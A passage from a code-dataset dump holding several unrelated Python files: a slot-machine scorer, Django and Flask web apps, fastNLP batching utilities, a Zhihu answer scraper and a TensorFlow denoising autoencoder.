freq['Wild'] == 1:\n if key == 'Star' and item == 2:\n return 18\n elif key == 'Bell' and item == 2:\n return 16\n elif key == 'Shell' and item == 2:\n return 14\n elif key == 'Seven' and item == 2:\n return 12\n elif key == 'Cherry' and item == 2:\n return 10\n elif key == 'Bar' and item == 2:\n return 8\n if key == 'King' and item == 2:\n return 6\n elif key == 'Queen' and item == 2:\n return 4\n elif key == 'Jack' and item == 2:\n return 2\n else:\n if item == 3:\n if key == 'Wild':\n return 100\n elif key == 'Star':\n return 90\n elif key == 'Bell':\n return 80\n elif key == 'Shell':\n return 70\n elif key == 'Seven':\n return 60\n elif key == 'Cherry':\n return 50\n elif key == 'Bar':\n return 40\n elif key == 'King':\n return 30\n elif key == 'Queen':\n return 20\n elif key == 'Jack':\n return 10\n elif item == 2:\n if key == 'Wild':\n return 10\n elif key == 'Star':\n return 9\n elif key == 'Bell':\n return 8\n elif key == 'Shell':\n return 7\n elif key == 'Seven':\n return 6\n elif key == 'Cherry':\n return 5\n elif key == 'Bar':\n return 4\n elif key == 'King':\n return 3\n elif key == 'Queen':\n return 2\n elif key == 'Jack':\n return 1\n else: \n return 0\n break\n\n # for item in fruit_array:\n # if freq[\"King\"] == 2 and freq[\"Wild\"] == 1:\n # break\n # print(6)\n # elif freq[\"King\"] == 2:\n # break\n # print(3)\n\n # if fruit_array.count()\n # print(fruit_array.count()))\n\n# reel1 = [\"King\", \"Jack\", \"Wild\", \"Bell\", \"Star\", \"Seven\", \"Queen\", \"Cherry\", \"Shell\", \"Bar\"]\n# reel2 = [\"Star\", \"Bar\", \"Jack\", \"Seven\", \"Queen\", \"Wild\", \"King\", \"Bell\", \"Cherry\", \"Shell\"]\n# reel3 = [\"King\", \"Bell\", \"Jack\", \"Shell\", \"Star\", \"Cherry\", \"Queen\", \"Bar\", \"Wild\", \"Seven\"]\n# spin = [0,5,0]\n# fruit([reel1,reel2,reel3],spin)\n\n# reel1 = ['King', 'Jack', 'Queen', 'Wild', 'Shell', 'Bar', 'Cherry', 'Seven', 'Bell', 'Star']\n# reel2 = ['Bar', 'Seven', 'Cherry', 'Wild', 'Star', 'King', 'Bell', 'Jack', 'Queen', 'Shell']\n# reel3 = ['Bar', 'Cherry', 'Bell', 'Star', 'Queen', 'Seven', 'Shell', 'Wild', 'King', 'Jack']\n# spin = [9,2,5]\n# fruit([reel1,reel2,reel3],spin)\n\nreel1 = ['Queen', 'Seven', 'Star', 'Wild', 'Bar', 'Bell', 'Jack', 'Shell', 'King', 'Cherry']\nreel2 = ['King', 'Jack', 'Bell', 'Cherry', 'Wild', 'Bar', 'Star', 'Queen', 'Shell', 'Seven']\nreel3 = ['Shell', 'Seven', 'Cherry', 'Queen', 'Jack', 'Star', 'King', 'Bar', 'Bell', 'Wild']\nspin = [7, 6, 5]\nfruit([reel1,reel2,reel3],spin)\n\n# my_list.sort()\n# for i in range (len (my_list) -1):\n# \tif my_list[i] == my_list[i+1]:\n# \tprint (my_list[i])","sub_path":"python/toy-problems/fruit_machine.py","file_name":"fruit_machine.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"335487657","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns=[\n url('^$',views.index,name='index'),\n\n url(r'^profile/',views.profile,name='profile'),\n url(r'^edit/profile$',views.edit_profile,name='edit-profile'),\n # url(r'^update/profile/(?P\\w{0,50})',views.update_profile,name='update-profile'),\n url(r'^update/profile/(\\d+)',views.update_profile,name='update-profile'),\n url(r'^new/comment$',views.new_comment,name='comment'),\n url(r'^comments$',views.comments,name='comments'),\n\n url(r'^update/neighborhood$',views.update_neighborhood,name='update-neighborhood'),\n url(r'^post/',views.post,name='post'),\n url(r'^business/',views.business,name='business'),\n url(r'^contacts/',views.contacts,name='contacts'),\n url(r'^neighbourhood/(\\d+)',views.neighbourhood,name='neighbourhood'),\n\n\n\n url(r'^businessdetails/(\\d+)',views.businessdetails,name ='businessdetails'),\n\n url(r'^search/', views.search_results, name='search_results'),\n url(r'^neighborhood/(\\d+)',views.neighborhood,name='neighborhood'),\n]\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","sub_path":"hood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200497048","text":"\"\"\"\nQuestion 11:\nYou will be given the elements\n of A set with N elements and B set\n with M elements (2 <= N, M <= 100).\n Write the program that finds the\n elements of the A⋃B set. In the first\n line of the entry, the number N will\n be given, followed by the elements\n of the A set. In the second line,\n first the number M, then the elements\n of the set B will be given. When \n printing the result on the output,\n you must print the elements in the\n order they appear in set A.\n Intersections are guaranteed\n not to be empty sets. Set elements\n will only consist of alphabet letters\n and numbers.\n\"\"\"\n\ndef find_union(set1,set2):\n conjunction=\"\"\n for i in set1:\n if i not in conjunction:\n conjunction += str(i)\n for x in set2:\n if x not in conjunction:\n conjunction += str(x)\n return conjunction\nprint(find_union(\"abcde1234\", \"cdefg6789\"))","sub_path":"for loops and lists/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326179128","text":"\"\"\"\nbatch 模块实现了 fastNLP 所需的 :class:`~fastNLP.core.batch.DataSetIter` 类。\n\n\"\"\"\n__all__ = [\n \"BatchIter\",\n \"DataSetIter\",\n \"TorchLoaderIter\",\n]\n\nimport atexit\nimport abc\n\nfrom numbers import Number\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom collections import defaultdict\n\nfrom .dataset import DataSet\nfrom .sampler import SequentialSampler\nfrom .field import _get_ele_type_and_dim\nfrom ._logger import logger\n\n\n_python_is_exit = False\n\n\ndef _set_python_is_exit():\n global _python_is_exit\n _python_is_exit = True\n\n\natexit.register(_set_python_is_exit)\n\n\ndef may_to_tensor(data, as_numpy, fn):\n if not as_numpy:\n dtype, dim = _get_ele_type_and_dim(data)\n try:\n data, flag = _to_tensor(data, dtype)\n except TypeError as e:\n logger.error(f\"Field {fn} cannot be converted to torch.tensor.\")\n raise e\n return data\n\n\ndef convert_tensor(batch_dict, as_numpy):\n for n, v in batch_dict.items():\n batch_dict[n] = may_to_tensor(v, as_numpy, n)\n\nclass DataSetGetter:\n \"\"\"\n 传递给torch.utils.data.DataLoader获取数据,DataLoder会传入int的idx获取数据(调用这里的__getitem__()函数)。\n \"\"\"\n def __init__(self, dataset: DataSet, as_numpy=False):\n self.dataset = dataset\n self.as_numpy = as_numpy\n self.idx_list = list(range(len(dataset)))\n\n self.x_names = {n for n, f in dataset.get_all_fields().items() if f.is_input}\n self.y_names = {n for n, f in dataset.get_all_fields().items() if f.is_target}\n\n def __getitem__(self, idx: int):\n # mapping idx to sampled idx\n idx = self.idx_list[idx]\n ins = self.dataset[idx]\n return idx, ins\n\n def __len__(self):\n return len(self.dataset)\n\n def collate_fn(self, ins_list: list):\n \"\"\"\n\n :param batch: [[idx1, x_dict1, y_dict1], [idx2, x_dict2, y_dict2], [xx, xx, xx]]\n :return:\n \"\"\"\n indices = []\n sin_x, sin_y = defaultdict(list), defaultdict(list)\n for idx, ins in ins_list:\n indices.append(idx)\n for n, v in ins.items():\n if n in self.x_names:\n sin_x[n].append(v)\n if n in self.y_names:\n sin_y[n].append(v)\n\n def pad(batch_dict):\n result = {}\n for n, vlist in batch_dict.items():\n f = self.dataset.field_arrays[n]\n if f.padder is None:\n result[n] = np.array(vlist)\n else:\n result[n] = f.pad(vlist)\n return result\n\n sin_x = pad(sin_x)\n sin_y = pad(sin_y)\n convert_tensor(sin_x, self.as_numpy)\n convert_tensor(sin_y, self.as_numpy)\n\n if not self.dataset.collector.is_empty():\n bx, by = self.dataset._collect_batch(ins_list)\n sin_x.update(bx)\n sin_y.update(by)\n\n return (indices, sin_x, sin_y)\n\n def __getattr__(self, item):\n if hasattr(self.dataset, item):\n return getattr(self.dataset, item)\n else:\n raise AttributeError(\"'DataSetGetter' object has no attribute '{}'\".format(item))\n\n\nclass SamplerAdapter(torch.utils.data.Sampler):\n \"\"\"\n 用于传入torch.utils.data.DataLoader中,DataLoader会调用__iter__()方法获取index(一次只取一个int)\n\n \"\"\"\n def __init__(self, sampler, dataset):\n super().__init__(dataset)\n self.sampler = sampler\n self.dataset = dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __iter__(self):\n return iter(self.sampler(self.dataset))\n\n\nclass BatchIter:\n \"\"\"\n Trainer用于迭代数据的类。继承该类,并实现get_num_batches(), get_batch_indices(), dataset(), num_batches(),\n __iter__()方法。\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n if not isinstance(sampler, torch.utils.data.Sampler):\n self.sampler = SamplerAdapter(sampler=sampler or SequentialSampler(), dataset=dataset)\n else:\n self.sampler = sampler\n\n # DataLoader的collect_fn输入是List[],里面的元素是dataset[index]返回的结果\n if collate_fn is None:\n # pytoch <= 1.1 中不能设置collate_fn=None\n self.dataiter = torch.utils.data.DataLoader(\n dataset=dataset, batch_size=batch_size, sampler=self.sampler,\n num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last,\n timeout=timeout, worker_init_fn=worker_init_fn)\n else:\n self.dataiter = torch.utils.data.DataLoader(\n dataset=dataset, batch_size=batch_size, sampler=self.sampler,\n collate_fn=collate_fn, num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last,\n timeout=timeout, worker_init_fn=worker_init_fn)\n\n # 以sampler的数量为准,因为DistributedSampler的时候每个进程上并不是所有的数据都用上了\n self._num_batches = self.get_num_batches(len(self.dataiter.sampler), batch_size, drop_last)\n self.batch_size = batch_size\n self.cur_batch_indices = None\n\n @property\n def num_batches(self):\n return self._num_batches\n\n @num_batches.setter\n def num_batches(self, value):\n self._num_batches = value\n\n def init_iter(self):\n pass\n\n @staticmethod\n def get_num_batches(num_samples, batch_size, drop_last):\n \"\"\"\n 计算batch的数量。用于前端显示进度\n\n :param int num_samples:\n :param int batch_size:\n :param bool drop_last: 如果最后一个batch没有batch_size这么多,是否就丢掉。\n :return:\n \"\"\"\n num_batches = num_samples // batch_size\n if not drop_last and (num_samples % batch_size > 0):\n num_batches += 1\n return num_batches\n\n def get_batch_indices(self):\n \"\"\"\n 获取最近输出的batch的index。用于溯源当前batch的数据\n\n :return:\n \"\"\"\n return self.cur_batch_indices\n\n def __len__(self):\n return self.num_batches\n\n @property\n def dataset(self):\n \"\"\"\n 获取正在参与iterate的dataset\n\n :return:\n \"\"\"\n return self.dataiter.dataset\n\n @abc.abstractmethod\n def __iter__(self):\n \"\"\"\n 用于实际数据循环的类,返回值需要为两个dict, 第一个dict中的内容会认为是input, 第二个dict中的内容会认为是target\n\n :return:\n \"\"\"\n raise NotImplemented\n\n\nclass DataSetIter(BatchIter):\n \"\"\"\n DataSetIter 用于从 `DataSet` 中按一定的顺序, 依次按 ``batch_size`` 的大小将数据取出,\n 组成 `x` 和 `y`::\n\n batch = DataSetIter(data_set, batch_size=16, sampler=SequentialSampler())\n num_batch = len(batch)\n for batch_x, batch_y in batch:\n # do stuff ...\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None, as_numpy=False,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n \"\"\"\n \n :param dataset: :class:`~fastNLP.DataSet` 对象, 数据集\n :param int batch_size: 取出的batch大小\n :param sampler: 规定使用的 :class:`~fastNLP.Sampler` 方式. 若为 ``None`` , 使用 :class:`~fastNLP.SequentialSampler`.\n \n Default: ``None``\n :param bool as_numpy: 若为 ``True`` , 输出batch为 numpy.array. 否则为 :class:`torch.Tensor`.\n\n Default: ``False``\n :param int num_workers: 使用多少个进程来预处理数据\n :param bool pin_memory: 是否将产生的tensor使用pin memory, 可能会加快速度。\n :param bool drop_last: 如果最后一个batch没有batch_size这么多sample,就扔掉最后一个\n :param timeout: 生成一个batch的timeout值\n :param worker_init_fn: 在每个worker启动时调用该函数,会传入一个值,该值是worker的index。\n :param collate_fn: 用于将样本组合成batch的函数\n \"\"\"\n assert isinstance(dataset, DataSet)\n dataset = DataSetGetter(dataset, as_numpy)\n collate_fn = dataset.collate_fn if collate_fn is None else collate_fn\n super().__init__(\n dataset=dataset, batch_size=batch_size, sampler=sampler,\n num_workers=num_workers, pin_memory=pin_memory,\n drop_last=drop_last, timeout=timeout, worker_init_fn=worker_init_fn,\n collate_fn=collate_fn\n )\n\n def __iter__(self):\n self.init_iter()\n for indices, batch_x, batch_y in self.dataiter:\n self.cur_batch_indices = indices\n yield batch_x, batch_y\n\n\nclass TorchLoaderIter(BatchIter):\n \"\"\"\n 与DataSetIter类似,但用于pytorch的DataSet对象。\n 通过使用TorchLoaderIter封装pytorch的DataSet,然后将其传入到Trainer中。\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n \"\"\"\n\n :param dataset: :class:`~fastNLP.DataSet` 对象, 数据集\n :param int batch_size: 取出的batch大小\n :param sampler: 规定使用的 :class:`~fastNLP.Sampler` 方式. 若为 ``None`` , 使用 :class:`~fastNLP.SequentialSampler`.\n\n Default: ``None``\n :param int num_workers: 使用多少个进程来预处理数据\n :param bool pin_memory: 是否将产生的tensor使用pin memory, 可能会加快速度。\n :param bool drop_last: 如果最后一个batch没有batch_size这么多sample,就扔掉最后一个\n :param timeout: 生成一个batch的timeout值\n :param worker_init_fn: 在每个worker启动时调用该函数,会传入一个值,该值是worker的index。\n :param collate_fn: 用于将样本组合成batch的函数\"\"\"\n assert len(dataset) > 0\n ins = dataset[0]\n assert len(ins) == 2 and \\\n isinstance(ins[0], dict) and \\\n isinstance(ins[1], dict), 'DataSet should return two dict, as X and Y'\n\n super().__init__(\n dataset=dataset, batch_size=batch_size, sampler=sampler,\n num_workers=num_workers, pin_memory=pin_memory,\n drop_last=drop_last, timeout=timeout, worker_init_fn=worker_init_fn,\n collate_fn=collate_fn\n )\n\n def __iter__(self):\n self.init_iter()\n for batch_x, batch_y in self.dataiter:\n self.cur_batch_indices = None\n yield batch_x, batch_y\n\n\ndef _to_tensor(batch, field_dtype):\n \"\"\"\n\n :param batch: np.array()\n :param field_dtype: 数据类型\n :return: batch, flag. 如果传入的数据支持转为tensor,返回的batch就是tensor,且flag为True;如果传入的数据不支持转为tensor,\n 返回的batch就是原来的数据,且flag为False\n \"\"\"\n try:\n if field_dtype is not None and isinstance(field_dtype, type)\\\n and issubclass(field_dtype, Number) \\\n and not isinstance(batch, torch.Tensor):\n new_batch = torch.as_tensor(batch)\n flag = True\n else:\n new_batch = batch\n flag = False\n if torch.is_tensor(new_batch):\n if 'float' in new_batch.dtype.__repr__():\n new_batch = new_batch.float()\n elif 'int' in new_batch.dtype.__repr__():\n new_batch = new_batch.long()\n return new_batch, flag\n except Exception as e:\n raise e\n","sub_path":"fastNLP/core/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50370886","text":"import json\nimport time\nfrom flask import Flask, g\nfrom flask import jsonify, request\nfrom flask_restful import reqparse, Api, Resource\n# from flask_httpauth import HTTPTokenAuth\n\nfrom function import user_modeling, recommendation, system_critiquing\nfrom tool import time_helper\nimport pprint\nimport copy\n\n\npp = pprint.PrettyPrinter(indent=4)\n\n# Flask declaration\napp = Flask(__name__)\napi = Api(app)\n \n# considered_attributes\ncategorical_attributes = ['artist','genre']\nnumerical_attributes = ['popularity', 'danceability', 'energy', 'speechiness', 'tempo', 'valence']\n# numerical_attributes = ['popularity', 'danceability', 'energy', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence']\n\n\n# 操作(post / get)资源列表\nclass InitializeUserModel(Resource):\n def get(self):\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Initialize User Model\")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_historical_record = user_profile['user']['preferenceData']['track']\n # initialize the user preference model\n user_initial_preference_value = user_modeling.initialize_user_preference_value(user_historical_record, categorical_attributes, numerical_attributes)\n user_preference_attribute_frequency = user_modeling.initialize_user_preference_attribute_frequency( categorical_attributes, numerical_attributes)\n user_profile['user']['user_preference_model'] = {'preference_value':user_initial_preference_value, 'attribute_frequency':user_preference_attribute_frequency}\n # initialize the user constraints (empty)\n user_constraint = {}\n user_profile['user']['user_constraints'] = user_constraint\n # # initialize the user critique preference (empty)\n user_critique_preference = {}\n user_profile['user']['user_critique_preference'] = user_critique_preference\n\n # pp.pprint(user_initial_preference_value)\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Initialize User Model ---- run time : %ss ' % str(end-start))\n\n return user_profile\n\nclass UpdateUserModel(Resource):\n \n def get(self):\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Update User Model \")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_interaction_dialog = user_profile['logger']['latest_dialog']\n user_listened_longs = user_profile['logger']['listenedSongs']\n user_model = user_profile['user']\n # update the user model (three parts)\n updated_user_preference_model, updated_user_constraints, updated_user_critique_preference = user_modeling.update_user_model(user_model, \\\n user_interaction_dialog, user_listened_longs, categorical_attributes, numerical_attributes)\n user_profile['user']['user_preference_model'] = updated_user_preference_model\n user_profile['user']['user_constraints'] = updated_user_constraints\n user_profile['user']['user_critique_preference'] = updated_user_critique_preference\n \n # update the user interaction log \n for log in user_interaction_dialog:\n user_profile['logger']['dialog'].append(copy.deepcopy(log))\n \n user_profile['logger']['latest_dialog'] = []\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Update User Model ---- run time : %ss ' % str(end-start))\n\n # pp.pprint(user_profile)\n # 资源添加成功,返回201\n return user_profile\n \nclass GetRec(Resource):\n \n def get(self):\n\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Get Recommendation\")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_preference_model = user_profile['user']['user_preference_model'] \n user_critique_preference = user_profile['user']['user_critique_preference'] \n item_pool = user_profile['vis']\n top_K = 10\n method = 'MAUT_COMPAT' # (1) MAUT (2) COMPAT (3) MAUT_COMPAT\n alpha = 0.5\n recommendations = recommendation.compute_recommendation(user_preference_model, user_critique_preference, item_pool, top_K, categorical_attributes, numerical_attributes, method, alpha)\n recommendation_list = {'recommendation_list': recommendations}\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Get Recommendation ---- run time : %ss ' % str(end-start))\n\n\n return recommendation_list, 201\n\nclass GetSysCri(Resource):\n \n def get(self):\n\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Get System Critiques\")\n\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_preference_model = user_profile['user']['user_preference_model'] \n user_critique_preference = user_profile['user']['user_critique_preference'] \n\n user_interaction_log = user_profile['logger']\n item_pool = user_profile['vis']\n cur_rec = user_profile['topRecommendedSong']\n top_K = 10\n unit_or_compound = [1]\n \n method = 'MAUT_COMPAT'\n alpha = 0.5\n estimated_score_dict = recommendation.compute_recommendation(user_preference_model, user_critique_preference, item_pool, top_K, categorical_attributes, numerical_attributes, method, alpha, sort=False)\n \n sys_crit_version = 'diversity_oriented' # preference_oriented / diversity_oriented / personality_adjusted\n sys_crit = None\n if sys_crit_version == 'preference_oriented':\n sys_crit = system_critiquing.generate_system_critiques_preference_oriented(user_preference_model, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n if sys_crit_version == 'diversity_oriented':\n sys_crit = system_critiquing.generate_system_critiques_diversity_oriented(user_preference_model, user_interaction_log, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n if sys_crit_version == 'personality_adjusted':\n sys_crit = system_critiquing.generate_system_critiques_personality_adjusted(user_preference_model, user_interaction_log, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n\n # pp.pprint(sys_crit)\n sys_crit_with_rec_list = {'sys_crit': sys_crit}\n\n end = time.process_time()\n time_helper.print_current_time()\n print ('Get System Critiques ---- run time : %ss ' % str(end-start))\n\n\n\n return sys_crit_with_rec_list, 201\n\n\n# 设置路由,即路由地址为http://127.0.0.1:5000/xxx\napi.add_resource(InitializeUserModel, \"/initialize_user_model\") \napi.add_resource(UpdateUserModel, \"/update_user_model\") \napi.add_resource(GetRec, \"/get_rec\")\napi.add_resource(GetSysCri, \"/get_sys_cri\")\n \nif __name__ == \"__main__\":\n server = '127.0.0.1'\n port = '5000'\n app.run(debug=True, host= server, port=port)\n","sub_path":"backend/musicbot_py_api.py","file_name":"musicbot_py_api.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"401277513","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import relationship\n\nfrom database.database import Base\n\n\nclass Region(Base):\n __tablename__ = 'regions'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False, unique=True)\n # countries = relationship('Country', back_populates='region')\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return f'Region [ID: {self.id}, Name: {self.name}, countries: {self.countries}'\n","sub_path":"model/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"600934183","text":"\nimport requests\nimport time\nimport json\nfrom lxml import etree\n\ndef get_user_content(url):\n ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'\n header = {'user-agent':ua}\n response = requests.get(url,headers = header)\n selector = etree.HTML(response.text)\n content_dict = {}\n for i in range(1,16):\n content = selector.xpath(f\"//div[@class='List-item'][{i}]/div/div[2]/div/span/p/text()\")\n content_dict[f'{i}'] = content\n content_str = json.dumps(content_dict,ensure_ascii=False)\n with open('content.json','w',encoding='utf-8') as f: \n f.write(content_str)\n\nif __name__ == '__main__':\n url = 'https://www.zhihu.com/question/433415189'\n get_user_content(url)\n\n\n","sub_path":"week02/work02/zhihu_requests.py","file_name":"zhihu_requests.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277205492","text":"from django.shortcuts import render, redirect\nfrom .models import Class, Class_Description, Academy, Profile_preference, Request, Recommendation, RecommendationRequest\nfrom .rcmd import getRecommendation, filtering\nfrom .getcsv import saveinfo\nfrom .forms import RequestForm, RecommendationRequestForm\n\ndef home(request) :\n # Information about class_description stored in DB \n saveinfo()\n return render(request, 'home.html')\n\ndef request(request) :\n\n # pass form and save request to db\n if request.method == \"POST\":\n form = RequestForm(request.POST)\n if form.is_valid():\n rq = form.save(commit=False)\n rq.save()\n else:\n form = RequestForm()\n return render(request, 'request.html', {'form' : form})\n\ndef recommendation(request) :\n\n rq = Request.objects.last()\n \n # Handing over the list of student preferences in order\n p = Profile_preference.objects.all()\n p_list = []\n p_list.insert(0, p[0].classSize)\n p_list.insert(1, p[0].tuition)\n p_list.insert(2, p[0].teacherCareer)\n p_list.insert(3, p[0].ageDistribition)\n\n # Return the recommended class id list by referring to filtered data and student preferences\n class_list = getRecommendation(filtering(rq.level), p_list)\n\n # Find class list with class id and save result to Recommendation\n for cid in class_list :\n c = Class.objects.filter(class_id = cid)\n r = Recommendation(recommendation_id = cid, classList = c[0].name)\n\n # Do not save duplicate values.\n dup = Recommendation.objects.filter(recommendation_id = cid)\n if(dup) : \n continue\n else :\n r.save()\n\n # pass all recommendation objects under the name rcmd_class to the html file.\n rcmd_class = Recommendation.objects.all()\n \n # pass form and save request to db\n if request.method == \"POST\":\n form = RecommendationRequestForm(request.POST)\n if form.is_valid():\n rq = form.save(commit=False)\n rq.save()\n else:\n form = RecommendationRequestForm()\n\n return render(request, 'recommendation.html', {'rcmd_class' : rcmd_class, 'form': form})\n \n\ndef result(request) :\n rq = RecommendationRequest.objects.last()\n\n # Find class with class name\n my_class = Class.objects.filter(name = rq.selected_class)\n lk = my_class[0].like\n\n # Find class description with class name\n class_dscp = Class_Description.objects.filter(subject = rq.selected_class)\n\n # Find academy information with class name\n my_aca = Academy.objects.filter(name = my_class[0].academy_name)\n \n # Student can check his interest\n if request.method == \"POST\" : \n my_class.update(like = lk+1)\n return redirect('result')\n else :\n return render(request, 'request.html',{'my_class' : my_class , 'class_dscp' : class_dscp , 'my_aca' : my_aca})\n","sub_path":"MAXIM/maxim/recommendation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262739564","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\n\r\n# Set random seed for reproducibility\r\nnp.random.seed(1000)\r\ntf.random.set_seed(1000)\r\n\r\n\r\nnb_samples = 1000\r\nnb_epochs = 400\r\nbatch_size = 200\r\ncode_length = 256\r\n\r\n\r\nclass DAC(tf.keras.Model):\r\n def __init__(self):\r\n super(DAC, self).__init__()\r\n\r\n # Encoder layers\r\n self.c1 = tf.keras.layers.Conv2D(\r\n filters=32,\r\n kernel_size=(3, 3),\r\n strides=(2, 2),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.c2 = tf.keras.layers.Conv2D(\r\n filters=64,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.c3 = tf.keras.layers.Conv2D(\r\n filters=128,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.flatten = tf.keras.layers.Flatten()\r\n\r\n self.dense = tf.keras.layers.Dense(\r\n units=code_length,\r\n activation=tf.keras.activations.sigmoid)\r\n\r\n # Decoder layers\r\n self.dc0 = tf.keras.layers.Conv2DTranspose(\r\n filters=128,\r\n kernel_size=(3, 3),\r\n strides=(2, 2),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc1 = tf.keras.layers.Conv2DTranspose(\r\n filters=64,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc2 = tf.keras.layers.Conv2DTranspose(\r\n filters=32,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc3 = tf.keras.layers.Conv2DTranspose(\r\n filters=1,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.sigmoid,\r\n padding='same')\r\n\r\n def r_images(self, x):\r\n return tf.image.resize(x, (32, 32))\r\n\r\n def encoder(self, x):\r\n c1 = self.c1(self.r_images(x))\r\n c2 = self.c2(c1)\r\n c3 = self.c3(c2)\r\n code_input = self.flatten(c3)\r\n z = self.dense(code_input)\r\n return z\r\n\r\n def decoder(self, z):\r\n decoder_input = tf.reshape(z, (-1, 16, 16, 1))\r\n dc0 = self.dc0(decoder_input)\r\n dc1 = self.dc1(dc0)\r\n dc2 = self.dc2(dc1)\r\n dc3 = self.dc3(dc2)\r\n return dc3\r\n\r\n def call(self, x):\r\n code = self.encoder(x)\r\n xhat = self.decoder(code)\r\n return xhat\r\n\r\n\r\n# Create the model\r\nmodel = DAC()\r\n\r\n# Define the optimizer and the train loss function\r\noptimizer = tf.keras.optimizers.Adam(0.001)\r\ntrain_loss = tf.keras.metrics.Mean(name='train_loss')\r\n\r\n\r\n@tf.function\r\ndef train(noisy_images, images):\r\n with tf.GradientTape() as tape:\r\n reconstructions = model(noisy_images)\r\n loss = tf.keras.losses.MSE(\r\n model.r_images(images), reconstructions)\r\n gradients = tape.gradient(\r\n loss, model.trainable_variables)\r\n optimizer.apply_gradients(\r\n zip(gradients, model.trainable_variables))\r\n train_loss(loss)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Load the dataset\r\n (X_train, _), (_, _) = \\\r\n tf.keras.datasets.fashion_mnist.load_data()\r\n X_train = X_train.astype(np.float32)[0:nb_samples] \\\r\n / 255.0\r\n\r\n width = X_train.shape[1]\r\n height = X_train.shape[2]\r\n\r\n X_train_g = tf.data.Dataset.\\\r\n from_tensor_slices(np.expand_dims(X_train, axis=3)).\\\r\n shuffle(1000).batch(batch_size)\r\n\r\n # Train the model\r\n for e in range(nb_epochs):\r\n for xi in X_train_g:\r\n xn = np.clip(xi +\r\n np.random.normal(\r\n 0.0, 0.2,\r\n size=(batch_size, width, height, 1)),\r\n 0.0, 1.0)\r\n train(xn, xi)\r\n print(\"Epoch {}: Loss: {:.3f}\".\r\n format(e + 1, train_loss.result()))\r\n train_loss.reset_states()\r\n\r\n # Show some examples\r\n Xs = np.reshape(X_train[0:batch_size],\r\n (batch_size, width, height, 1))\r\n Xn = np.clip(Xs +\r\n np.random.normal(\r\n 0.0, 0.2,\r\n size=(batch_size, width, height, 1)),\r\n 0.0, 1.0)\r\n Ys = model(Xs)\r\n Ys = np.squeeze(Ys * 255.0)\r\n\r\n # Show the results\r\n sns.set()\r\n\r\n fig, ax = plt.subplots(2, 10, figsize=(18, 4))\r\n\r\n for i in range(10):\r\n ax[0, i].imshow(np.squeeze(Xs[i]), cmap='gray')\r\n ax[0, i].set_xticks([])\r\n 